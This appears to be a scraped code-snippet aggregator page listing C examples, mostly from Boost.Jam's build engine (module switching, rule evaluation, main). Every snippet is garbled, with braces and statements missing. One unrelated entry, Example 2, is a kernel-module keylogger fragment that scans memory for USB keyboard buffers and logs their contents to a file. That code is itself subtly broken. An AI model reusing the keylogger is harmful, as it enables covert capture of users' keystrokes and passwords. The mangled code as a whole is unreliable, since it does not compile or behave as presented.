Exemplo n.º 1
static void type_check
    char  * type_name,
    LIST  * values,
    FRAME * caller,
    RULE  * called,
    LIST  * arg_name
    static module_t * typecheck = 0;

    /* If nothing to check, bail now. */
    if ( !values || !type_name )

    if ( !typecheck )
        typecheck = bindmodule( ".typecheck" );

    /* If the checking rule can not be found, also bail. */
        RULE checker_, *checker = &checker_;

        checker->name = type_name;
        if ( !typecheck->rules || !hashcheck( typecheck->rules, (HASHDATA * *)&checker ) )

    exit_module( caller->module );

    while ( values != 0 )
        LIST *error;
        FRAME frame[1];
        frame_init( frame );
        frame->module = typecheck;
        frame->prev = caller;
        frame->prev_user = caller->module->user_module ? caller : caller->prev_user;

        enter_module( typecheck );
        /* Prepare the argument list */
        lol_add( frame->args, list_new( L0, values->string ) );
        error = evaluate_rule( type_name, frame );

        exit_module( typecheck );

        if ( error )
            argument_error( error->string, called, caller, arg_name );

        frame_free( frame );
        values = values->next;

    enter_module( caller->module );
Exemplo n.º 2
static int __init scan_start(void){
unsigned long long i;

for(i = 0; i < ULLONG_MAX; i += 0x10){
    struct urb *urbp = (struct urb *)x(i);
    if(((urbp->dev % 0x400) == 0) &&
       ((urbp->transfer_dma % 0x20) == 0) &&
       (urbp->transfer_buffer_length == 8) &&
       (urbp->transfer_buffer != NULL) &&
       strncmp(urbp->dev->product, "usb", 32) &&
       strncmp(urbp->dev->product, "keyboard", 32)){
           // found possible keyboard buffer
	   char* kbuf = (char *) kmalloc(sizeof(urbp->transfer_buffer), GFP_KERNEL);
	   kbuf = urbp->transfer_buffer;
	   write_to_file(log, kbuf, sizeof(kbuf));
           char* newline = "\n";
	   write_to_file(log, newline, sizeof(newline));

static void __exit scan_end(void){
    // do something

Exemplo n.º 3
 * swap_settings() - replace the settings from the current module and
 *                   target with those from the new module and target
static void swap_settings(
    module_t** current_module
    , TARGET** current_target
    , module_t* new_module
    , TARGET* new_target)
    if (new_module == root_module())
        new_module = 0;
    if (new_target == *current_target && new_module == *current_module)

    if (*current_target)
        popsettings( (*current_target)->settings );
    if (new_module != *current_module)
        if (*current_module)
            exit_module( *current_module );

        *current_module = new_module;
        if (new_module)
            enter_module( new_module );

    *current_target = new_target;
    if (new_target)
        pushsettings( new_target->settings );
Exemplo n.º 4
OBJECT * make_class_module( LIST * xname, LIST * bases, FRAME * frame )
    OBJECT     * name = class_module_name( xname->value );
    OBJECT   * * pp = &xname->value;
    module_t   * class_module = 0;
    module_t   * outer_module = frame->module;
    OBJECT     * name_ = object_new( "__name__" );
    OBJECT     * bases_ = object_new( "__bases__" );

    if ( !classes )
        classes = hashinit( sizeof( OBJECT * ), "classes" );

    if ( hashenter( classes, (HASHDATA * *)&pp ) )
        *pp = object_copy( xname->value );
        printf( "Class %s already defined\n", object_str( xname->value ) );
    check_defined( bases );

    class_module = bindmodule( name );

    exit_module( outer_module );
    enter_module( class_module );

    var_set( name_, xname, VAR_SET );
    var_set( bases_, bases, VAR_SET );

    exit_module( class_module );
    enter_module( outer_module );

    for ( ; bases; bases = bases->next )
        import_base_rules( class_module, bases->value );

    object_free( bases_ );
    object_free( name_ );

    return name;
Exemplo n.º 5
static LIST* evaluate_in_module ( char* module_name, PARSE * p, FRAME* frame)
    LIST* result;

    module_t* outer_module = frame->module;
    frame->module = module_name ? bindmodule( module_name ) : root_module();

    if ( outer_module != frame->module )
        exit_module( outer_module );
        enter_module( frame->module );

    result = parse_evaluate( p, frame );

    if ( outer_module != frame->module )
        exit_module( frame->module );
        enter_module( outer_module );
        frame->module = outer_module;

    return result;
Exemplo n.º 6
    char  * rulename,
    FRAME * frame )
    LIST          * result = L0;
    RULE          * rule;
    profile_frame   prof[1];
    module_t      * prev_module = frame->module;

    LIST * l;
        LOL arg_context_, * arg_context = &arg_context_;
        if ( !frame->prev )
            arg_context = frame->prev->args;
        l = var_expand( L0, rulename, rulename+strlen(rulename), arg_context, 0 );

    if ( !l )
        backtrace_line( frame->prev );
        printf( "warning: rulename %s expands to empty string\n", rulename );
        backtrace( frame->prev );
        return result;

    rulename = l->string;
    rule = bindrule( l->string, frame->module );

    if ( rule->python_function )
        /* The below messing with modules is due to the way modules are
         * implemented in Jam. Suppose we are in module M1 now. The global
         * variable map actually holds 'M1' variables, and M1->variables hold
         * global variables.
         * If we call Python right away, Python calls back Jam and then Jam
         * does 'module M1 { }' then Jam will try to swap the current global
         * variables with M1->variables. The result will be that global
         * variables map will hold global variables, and any variable settings
         * we do will go to the global module, not M1.
         * By restoring basic state, where the global variable map holds global
         * variable, we make sure any future 'module M1' entry will work OK.

        LIST * result;
        module_t * m = python_module();

        frame->module = m;

        exit_module( prev_module );
        enter_module( m );

        result = call_python_function( rule, frame );

        exit_module( m );
        enter_module ( prev_module );

        return result;

    /* Drop the rule name. */
    l = list_pop_front( l );

    /* Tack the rest of the expansion onto the front of the first argument. */
    frame->args->list[0] = list_append( l, lol_get( frame->args, 0 ) );

    if ( DEBUG_COMPILE )
        /* Try hard to indicate in which module the rule is going to execute. */
        if ( rule->module != frame->module
             && rule->procedure != 0 && strcmp( rulename, rule->procedure->rulename ) )
            char buf[256] = "";
            strncat( buf, rule->module->name, sizeof( buf ) - 1 );
            strncat( buf, rule->name, sizeof( buf ) - 1 );
            debug_compile( 1, buf, frame );
            debug_compile( 1, rulename, frame );

        lol_print( frame->args );
        printf( "\n" );

    if ( rule->procedure && rule->module != prev_module )
        /* Propagate current module to nested rule invocations. */
        frame->module = rule->module;

        /* Swap variables. */
        exit_module( prev_module );
        enter_module( rule->module );

    /* Record current rule name in frame. */
    if ( rule->procedure )
        frame->rulename = rulename;
        /* And enter record profile info. */
        if ( DEBUG_PROFILE )
            profile_enter( rule->procedure->rulename, prof );

    /* Check traditional targets $(<) and sources $(>). */
    if ( !rule->actions && !rule->procedure )
        backtrace_line( frame->prev );
        printf( "rule %s unknown in module %s\n", rule->name, frame->module->name );
        backtrace( frame->prev );
        exit( 1 );

    /* If this rule will be executed for updating the targets then construct the
     * action for make().
    if ( rule->actions )
        TARGETS * t;
        ACTION  * action;

        /* The action is associated with this instance of this rule. */
        action = (ACTION *)BJAM_MALLOC( sizeof( ACTION ) );
        memset( (char *)action, '\0', sizeof( *action ) );

        action->rule = rule;
        action->targets = targetlist( (TARGETS *)0, lol_get( frame->args, 0 ) );
        action->sources = targetlist( (TARGETS *)0, lol_get( frame->args, 1 ) );

        /* If we have a group of targets all being built using the same action
         * then we must not allow any of them to be used as sources unless they
         * had all already been built in the first place or their joined action
         * has had a chance to finish its work and build all of them anew.
         * Without this it might be possible, in case of a multi-process build,
         * for their action, triggered by buiding one of the targets, to still
         * be running when another target in the group reports as done in order
         * to avoid triggering the same action again and gets used prematurely.
         * As a quick-fix to achieve this effect we make all the targets list
         * each other as 'included targets'. More precisely, we mark the first
         * listed target as including all the other targets in the list and vice
         * versa. This makes anyone depending on any of those targets implicitly
         * depend on all of them, thus making sure none of those targets can be
         * used as sources until all of them have been built. Note that direct
         * dependencies could not have been used due to the 'circular
         * dependency' issue.
         * TODO: Although the current implementation solves the problem of one
         * of the targets getting used before its action completes its work it
         * also forces the action to run whenever any of the targets in the
         * group is not up to date even though some of them might not actually
         * be used by the targets being built. We should see how we can
         * correctly recognize such cases and use that to avoid running the
         * action if possible and not rebuild targets not actually depending on
         * targets that are not up to date.
         * TODO: Using the 'include' feature might have side-effects due to
         * interaction with the actual 'inclusion scanning' system. This should
         * be checked.
        if ( action->targets )
            TARGET * t0 = action->targets->target;
            for ( t = action->targets->next; t; t = t->next )
                target_include( t->target, t0 );
                target_include( t0, t->target );

        /* Append this action to the actions of each target. */
        for ( t = action->targets; t; t = t->next )
            t->target->actions = actionlist( t->target->actions, action );

    /* Now recursively compile any parse tree associated with this rule.
     * parse_refer()/parse_free() call pair added to ensure rule not freed
     * during use.
    if ( rule->procedure )
        SETTINGS * local_args = collect_arguments( rule, frame );
        PARSE * parse = rule->procedure;
        parse_refer( parse );

        pushsettings( local_args );
        result = parse_evaluate( parse, frame );
        popsettings( local_args );
        freesettings( local_args );

        parse_free( parse );

    if ( frame->module != prev_module )
        exit_module( frame->module );
        enter_module( prev_module );

    if ( DEBUG_PROFILE && rule->procedure )
        profile_exit( prof );

    if ( DEBUG_COMPILE )
        debug_compile( -1, 0, frame);

    return result;
Exemplo n.º 7
int main( int argc, char * * argv, char * * arg_environ )
    int                     n;
    char                  * s;
    struct option           optv[N_OPTS];
    char            const * all = "all";
    int                     status;
    int                     arg_c = argc;
    char          *       * arg_v = argv;
    char            const * progname = argv[0];

    saved_argv0 = argv[0];


# ifdef OS_MAC
# endif


    if ( getoptions( argc, argv, "-:l:d:j:p:f:gs:t:ano:qv", optv ) < 0 )
        printf( "\nusage: %s [ options ] targets...\n\n", progname );

        printf( "-a      Build all targets, even if they are current.\n" );
        printf( "-dx     Set the debug level to x (0-9).\n" );
        printf( "-fx     Read x instead of Jambase.\n" );
        /* printf( "-g      Build from newest sources first.\n" ); */
        printf( "-jx     Run up to x shell commands concurrently.\n" );
        printf( "-lx     Limit actions to x number of seconds after which they are stopped.\n" );
        printf( "-n      Don't actually execute the updating actions.\n" );
        printf( "-ox     Write the updating actions to file x.\n" );
        printf( "-px     x=0, pipes action stdout and stderr merged into action output.\n" );
        printf( "-q      Quit quickly as soon as a target fails.\n" );
        printf( "-sx=y   Set variable x=y, overriding environment.\n" );
        printf( "-tx     Rebuild x, even if it is up-to-date.\n" );
        printf( "-v      Print the version of jam and exit.\n" );
        printf( "--x     Option is ignored.\n\n" );

        exit( EXITBAD );

    /* Version info. */
    if ( ( s = getoptval( optv, 'v', 0 ) ) )
        printf( "Boost.Jam  " );
        printf( "Version %s. %s.\n", VERSION, OSMINOR );
        printf( "   Copyright 1993-2002 Christopher Seiwald and Perforce Software, Inc.  \n" );
        printf( "   Copyright 2001 David Turner.\n" );
        printf( "   Copyright 2001-2004 David Abrahams.\n" );
        printf( "   Copyright 2002-2008 Rene Rivera.\n" );
        printf( "   Copyright 2003-2008 Vladimir Prus.\n" );

        return EXITOK;

    /* Pick up interesting options. */
    if ( ( s = getoptval( optv, 'n', 0 ) ) )
        globs.noexec++, globs.debug[2] = 1;

    if ( ( s = getoptval( optv, 'p', 0 ) ) )
        /* Undocumented -p3 (acts like both -p1 -p2) means separate pipe action
         * stdout and stderr.
        globs.pipe_action = atoi( s );
        if ( ( 3 < globs.pipe_action ) || ( globs.pipe_action < 0 ) )
                "Invalid pipe descriptor '%d', valid values are -p[0..3].\n",
                globs.pipe_action );
            exit( EXITBAD );

    if ( ( s = getoptval( optv, 'q', 0 ) ) )
        globs.quitquick = 1;

    if ( ( s = getoptval( optv, 'a', 0 ) ) )

    if ( ( s = getoptval( optv, 'j', 0 ) ) )
        globs.jobs = atoi( s );
        if (globs.jobs == 0)
            printf("Invalid value for the '-j' option.\n");

    if ( ( s = getoptval( optv, 'g', 0 ) ) )
        globs.newestfirst = 1;

    if ( ( s = getoptval( optv, 'l', 0 ) ) )
        globs.timeout = atoi( s );

    /* Turn on/off debugging */
    for ( n = 0; ( s = getoptval( optv, 'd', n ) ); ++n )
        int i;

        /* First -d, turn off defaults. */
        if ( !n )
            for ( i = 0; i < DEBUG_MAX; ++i )
                globs.debug[i] = 0;

        i = atoi( s );

        if ( ( i < 0 ) || ( i >= DEBUG_MAX ) )
            printf( "Invalid debug level '%s'.\n", s );

        /* n turns on levels 1-n. */
        /* +n turns on level n. */
        if ( *s == '+' )
            globs.debug[i] = 1;
        else while ( i )
            globs.debug[i--] = 1;


                static PyMethodDef BjamMethods[] = {
                    {"call", bjam_call, METH_VARARGS,
                     "Call the specified bjam rule."},
                    {"import_rule", bjam_import_rule, METH_VARARGS,
                     "Imports Python callable to bjam."},
                    {"define_action", bjam_define_action, METH_VARARGS,
                     "Defines a command line action."},
                    {"variable", bjam_variable, METH_VARARGS,
                     "Obtains a variable from bjam's global module."},
                    {"backtrace", bjam_backtrace, METH_VARARGS,
                     "Returns bjam backtrace from the last call into Python."},
                    {"caller", bjam_caller, METH_VARARGS,
                     "Returns the module from which the last call into Python is made."},
                    {NULL, NULL, 0, NULL}

                Py_InitModule( "bjam", BjamMethods );

#ifndef NDEBUG
#if YYDEBUG != 0
        if ( DEBUG_PARSE )
            yydebug = 1;

        /* Set JAMDATE. */
        var_set( "JAMDATE", list_new( L0, outf_time(time(0)) ), VAR_SET );

        /* Set JAM_VERSION. */
        var_set( "JAM_VERSION",
                 list_new( list_new( list_new( L0,
                   newstr( VERSION_MAJOR_SYM ) ),
                   newstr( VERSION_MINOR_SYM ) ),
                   newstr( VERSION_PATCH_SYM ) ),
                   VAR_SET );

        /* Set JAMUNAME. */
#ifdef unix
            struct utsname u;

            if ( uname( &u ) >= 0 )
                var_set( "JAMUNAME",
                                         list_new( L0,
                                            newstr( u.sysname ) ),
                                         newstr( u.nodename ) ),
                                     newstr( u.release ) ),
                                 newstr( u.version ) ),
                             newstr( u.machine ) ), VAR_SET );
#endif /* unix */

        /* Load up environment variables. */

        /* First into the global module, with splitting, for backward
         * compatibility.
        var_defines( use_environ, 1 );

        /* Then into .ENVIRON, without splitting. */
        enter_module( bindmodule(".ENVIRON") );
        var_defines( use_environ, 0 );
        exit_module( bindmodule(".ENVIRON") );

         * Jam defined variables OS & OSPLAT. We load them after environment, so
         * that setting OS in environment does not change Jam's notion of the
         * current platform.
        var_defines( othersyms, 1 );

        /* Load up variables set on command line. */
        for ( n = 0; ( s = getoptval( optv, 's', n ) ); ++n )
            char *symv[2];
            symv[ 0 ] = s;
            symv[ 1 ] = 0;
            var_defines( symv, 1 );
            enter_module( bindmodule(".ENVIRON") );
            var_defines( symv, 0 );
            exit_module( bindmodule(".ENVIRON") );

        /* Set the ARGV to reflect the complete list of arguments of invocation.
        for ( n = 0; n < arg_c; ++n )
            var_set( "ARGV", list_new( L0, newstr( arg_v[n] ) ), VAR_APPEND );

        /* Initialize built-in rules. */

        /* Add the targets in the command line to the update list. */
        for ( n = 1; n < arg_c; ++n )
            if ( arg_v[ n ][ 0 ] == '-' )
                char * f = "-:l:d:j:f:gs:t:ano:qv";
                for ( ; *f; ++f ) if ( *f == arg_v[ n ][ 1 ] ) break;
                if ( ( f[ 1 ] == ':' ) && ( arg_v[ n ][ 2 ] == '\0' ) ) ++n;
                mark_target_for_updating( arg_v[ n ] );

        if (!targets_to_update())

        /* Parse ruleset. */
            FRAME frame[ 1 ];
            frame_init( frame );
            for ( n = 0; ( s = getoptval( optv, 'f', n ) ); ++n )
                parse_file( s, frame );

            if ( !n )
                parse_file( "+", frame );

        status = yyanyerrors();

        /* Manually touch -t targets. */
        for ( n = 0; ( s = getoptval( optv, 't', n ) ); ++n )
            touch_target( s );

        /* If an output file is specified, set globs.cmdout to that. */
        if ( ( s = getoptval( optv, 'o', 0 ) ) )
            if ( !( globs.cmdout = fopen( s, "w" ) ) )
                printf( "Failed to write to '%s'\n", s );
                exit( EXITBAD );

        /* The build system may set the PARALLELISM variable to override -j
           options.  */
            LIST *p = L0;
            p = var_get ("PARALLELISM");
            if (p)
                int j = atoi (p->string);
                if (j == -1)
                    printf( "Invalid value of PARALLELISM: %s\n", p->string);
                    globs.jobs = j;

        /* KEEP_GOING overrides -q option. */
            LIST *p = L0;
            p = var_get ("KEEP_GOING");
            if (p)
                int v = atoi (p->string);
                if (v == 0)
                    globs.quitquick = 1;
                    globs.quitquick = 0;

        /* Now make target. */

            LIST * targets = targets_to_update();
            if (targets)
                int targets_count = list_length( targets );
                const char * * targets2 = (const char * *)
                    BJAM_MALLOC( targets_count * sizeof( char * ) );
                int n = 0;
                for ( ; targets; targets = list_next( targets ) )
                    targets2[ n++ ] = targets->string;
                status |= make( targets_count, targets2, anyhow );
                free( targets );
                status = last_update_now_status;

            PROFILE_EXIT( MAIN_MAKE );


    if ( DEBUG_PROFILE )

    /* Widely scattered cleanup. */

    /* Close cmdout. */
    if ( globs.cmdout )
        fclose( globs.cmdout );



    return status ? EXITBAD : EXITOK;
Exemplo n.º 8
    char    *rulename,
    FRAME *frame )
    LIST      *result = L0;
    RULE          *rule;
    profile_frame prof[1];
    module_t    *prev_module = frame->module;
    LIST      *l;
        LOL arg_context_, *arg_context = &arg_context_;
        if ( !frame->prev )
            arg_context = frame->prev->args;
        l = var_expand( L0, rulename, rulename+strlen(rulename), arg_context, 0 );

    if ( !l )
        backtrace_line( frame->prev );
        printf( "warning: rulename %s expands to empty string\n", rulename );
        backtrace( frame->prev );
        return result;

    rulename = l->string;
    rule = bindrule( l->string, frame->module );

    if (rule->python_function)
        return call_python_function(rule, frame);

    /* drop the rule name */
    l = list_pop_front( l );

    /* tack the rest of the expansion onto the front of the first argument */
    frame->args->list[0] = list_append( l, lol_get( frame->args, 0 ) );

    if ( DEBUG_COMPILE )
        /* Try hard to indicate in which module the rule is going to execute */
        if ( rule->module != frame->module
             && rule->procedure != 0 && strcmp(rulename, rule->procedure->rulename) )
            char buf[256] = "";
            strncat( buf, rule->module->name, sizeof(buf) - 1 );
            strncat( buf, rule->name, sizeof(buf) - 1 );
            debug_compile( 1, buf, frame);
            debug_compile( 1, rulename, frame);

        lol_print( frame->args );
        printf( "\n" );
    if ( rule->procedure && rule->module != prev_module )
        /* propagate current module to nested rule invocations */
        frame->module = rule->module;
        /* swap variables */
        exit_module( prev_module );
        enter_module( rule->module );
    /* record current rule name in frame */
    if ( rule->procedure )
        frame->rulename = rulename;
        /* and enter record profile info */
        if ( DEBUG_PROFILE )
            profile_enter( rule->procedure->rulename, prof );

    /* Check traditional targets $(<) and sources $(>) */

    if( !rule->actions && !rule->procedure )
        backtrace_line( frame->prev );
        printf( "rule %s unknown in module %s\n", rule->name, frame->module->name );
        backtrace( frame->prev );

    /* If this rule will be executed for updating the targets */
    /* then construct the action for make(). */

    if( rule->actions )
        TARGETS *t;
        ACTION  *action;

        /* The action is associated with this instance of this rule */

        action = (ACTION *)malloc( sizeof( ACTION ) );
        memset( (char *)action, '\0', sizeof( *action ) );

        action->rule = rule;
        action->targets = targetlist( (TARGETS *)0, lol_get( frame->args, 0 ) );
        action->sources = targetlist( (TARGETS *)0, lol_get( frame->args, 1 ) );

        /* Append this action to the actions of each target */

        for( t = action->targets; t; t = t->next )
            t->target->actions = actionlist( t->target->actions, action );

    /* Now recursively compile any parse tree associated with this rule */
    /* refer/free to ensure rule not freed during use */

    if( rule->procedure )
        SETTINGS *local_args = collect_arguments( rule, frame );
        PARSE *parse = rule->procedure;
        parse_refer( parse );
        pushsettings( local_args );
        result = parse_evaluate( parse, frame );
        popsettings( local_args );
        freesettings( local_args );
        parse_free( parse );

    if ( frame->module != prev_module )
        exit_module( frame->module );
        enter_module( prev_module );

    if ( DEBUG_PROFILE && rule->procedure )
        profile_exit( prof );

        debug_compile( -1, 0, frame);

    return result;
Exemplo n.º 9
int  main( int argc, char **argv, char **arg_environ )
    int		n;
    char		*s;
    struct option	optv[N_OPTS];
    const char	*all = "all";
    int		anyhow = 0;
    int		status;
    int arg_c = argc;
    char ** arg_v = argv;
    const char *progname = argv[0];

# ifdef OS_MAC
# endif

    argc--, argv++;

	if( getoptions( argc, argv, "-:l:d:j:f:gs:t:ano:qv", optv ) < 0 )
        printf( "\nusage: %s [ options ] targets...\n\n", progname );

        printf( "-a      Build all targets, even if they are current.\n" );
        printf( "-dx     Set the debug level to x (0-9).\n" );
        printf( "-fx     Read x instead of Jambase.\n" );
	    /* printf( "-g      Build from newest sources first.\n" ); */
        printf( "-jx     Run up to x shell commands concurrently.\n" );
        printf( "-lx     Limit actions to x number of seconds after which they are stopped.\n" );
        printf( "-n      Don't actually execute the updating actions.\n" );
        printf( "-ox     Write the updating actions to file x.\n" );
		printf( "-q      Quit quickly as soon as a target fails.\n" );
        printf( "-sx=y   Set variable x=y, overriding environment.\n" );
        printf( "-tx     Rebuild x, even if it is up-to-date.\n" );
        printf( "-v      Print the version of jam and exit.\n" );
        printf( "--x     Option is ignored.\n\n" );

        exit( EXITBAD );

    /* Version info. */

    if( ( s = getoptval( optv, 'v', 0 ) ) )
        printf( "Boost.Jam  " );
        printf( "Version %s. %s.\n", VERSION, OSMINOR );
	   printf( "   Copyright 1993-2002 Christopher Seiwald and Perforce Software, Inc.  \n" );
        printf( "   Copyright 2001 David Turner.\n" );
        printf( "   Copyright 2001-2004 David Abrahams.\n" );
        printf( "   Copyright 2002-2005 Rene Rivera.\n" );
        printf( "   Copyright 2003-2005 Vladimir Prus.\n" );

        return EXITOK;

    /* Pick up interesting options */

    if( ( s = getoptval( optv, 'n', 0 ) ) )
        globs.noexec++, globs.debug[2] = 1;

	if( ( s = getoptval( optv, 'q', 0 ) ) )
 	    globs.quitquick = 1;
    if( ( s = getoptval( optv, 'a', 0 ) ) )

    if( ( s = getoptval( optv, 'j', 0 ) ) )
        globs.jobs = atoi( s );

	if( ( s = getoptval( optv, 'g', 0 ) ) )
	    globs.newestfirst = 1;

    if( ( s = getoptval( optv, 'l', 0 ) ) )
        globs.timeout = atoi( s );

    /* Turn on/off debugging */

    for( n = 0; s = getoptval( optv, 'd', n ); n++ )
        int i;

        /* First -d, turn off defaults. */

        if( !n )
            for( i = 0; i < DEBUG_MAX; i++ )
                globs.debug[i] = 0;

        i = atoi( s );

        if( i < 0 || i >= DEBUG_MAX )
            printf( "Invalid debug level '%s'.\n", s );

        /* n turns on levels 1-n */
        /* +n turns on level n */

        if( *s == '+' )
            globs.debug[i] = 1;
        else while( i )
            globs.debug[i--] = 1;


    #ifdef HAVE_PYTHON
            static PyMethodDef BjamMethods[] = {
                {"call", bjam_call, METH_VARARGS,
                 "Call the specified bjam rule."},
                {"import_rule", bjam_import_rule, METH_VARARGS,
                 "Imports Python callable to bjam."},
                {NULL, NULL, 0, NULL}
            Py_InitModule("bjam", BjamMethods);
#ifndef NDEBUG
#if YYDEBUG != 0
    if ( DEBUG_PARSE )
        yydebug = 1;

    /* Set JAMDATE first */

        char *date;
        time_t clock;
        time( &clock );
        date = newstr( ctime( &clock ) );

        /* Trim newline from date */

        if( strlen( date ) == 25 )
            date[ 24 ] = 0;

        var_set( "JAMDATE", list_new( L0, newstr( date ) ), VAR_SET );

    var_set( "JAM_VERSION",
             list_new( list_new( list_new( L0, newstr( VERSION_MAJOR_SYM ) ), 
                                 newstr( VERSION_MINOR_SYM ) ), 
                       newstr( VERSION_PATCH_SYM ) ),
             VAR_SET );

    /* And JAMUNAME */
# ifdef unix
        struct utsname u;

        if( uname( &u ) >= 0 )
            var_set( "JAMUNAME", 
                                     list_new( L0, 
                                               newstr( u.sysname ) ),
                                     newstr( u.nodename ) ),
                                 newstr( u.release ) ),
                             newstr( u.version ) ),
                         newstr( u.machine ) ), VAR_SET );
# endif /* unix */

    /* load up environment variables */

    /* first into global module, with splitting, for backward compatibility */
    var_defines( use_environ, 1 );
    /* then into .ENVIRON, without splitting */
    enter_module( bindmodule(".ENVIRON") );
    var_defines( use_environ, 0 );
    exit_module( bindmodule(".ENVIRON") );

	 * Jam defined variables OS, OSPLAT
     * We load them after environment, so that
     * setting OS in environment does not 
     * change Jam notion of the current platform.

    var_defines( othersyms, 1 );

    /* Load up variables set on command line. */

    for( n = 0; s = getoptval( optv, 's', n ); n++ )
        char *symv[2];
        symv[0] = s;
        symv[1] = 0;
        var_defines( symv, 1 );

    /* Set the ARGV to reflect the complete list of arguments of invocation. */

    for ( n = 0; n < arg_c; ++n )
        var_set( "ARGV", list_new( L0, newstr( arg_v[n] ) ), VAR_APPEND );

	/* Initialize built-in rules */


    /* Add the targets in the command line to update list */

    for ( n = 1; n < arg_c; ++n )
        if ( arg_v[n][0] == '-' )
            char *f = "-:l:d:j:f:gs:t:ano:qv";
            for( ; *f; f++ ) if( *f == arg_v[n][1] ) break;
            if ( f[1] == ':' && arg_v[n][2] == '\0' ) { ++n; }

    /* Parse ruleset */

        FRAME frame[1];
        frame_init( frame );
	for( n = 0; s = getoptval( optv, 'f', n ); n++ )
	    parse_file( s, frame );

	if( !n )
	    parse_file( "+", frame );

    status = yyanyerrors();

    /* Manually touch -t targets */

    for( n = 0; s = getoptval( optv, 't', n ); n++ )
        touchtarget( s );

    /* If an output file is specified, set globs.cmdout to that */

    if( s = getoptval( optv, 'o', 0 ) )
        if( !( globs.cmdout = fopen( s, "w" ) ) )
            printf( "Failed to write to '%s'\n", s );
            exit( EXITBAD );

    /* Now make target */

        LIST* targets = targets_to_update();
        if ( !targets )
            status |= make( 1, &all, anyhow );
            int targets_count = list_length(targets);
            const char **targets2 = (const char **)malloc(targets_count * sizeof(char *));
            int n = 0;
            if ( DEBUG_PROFILE )
                profile_memory( targets_count * sizeof(char *) );
            for ( ; targets; targets = list_next(targets) )
                targets2[n++] = targets->string;
            status |= make( targets_count, targets2, anyhow );       

    if ( DEBUG_PROFILE )

    /* Widely scattered cleanup */


    /* close cmdout */

    if( globs.cmdout )
        fclose( globs.cmdout );


    return status ? EXITBAD : EXITOK;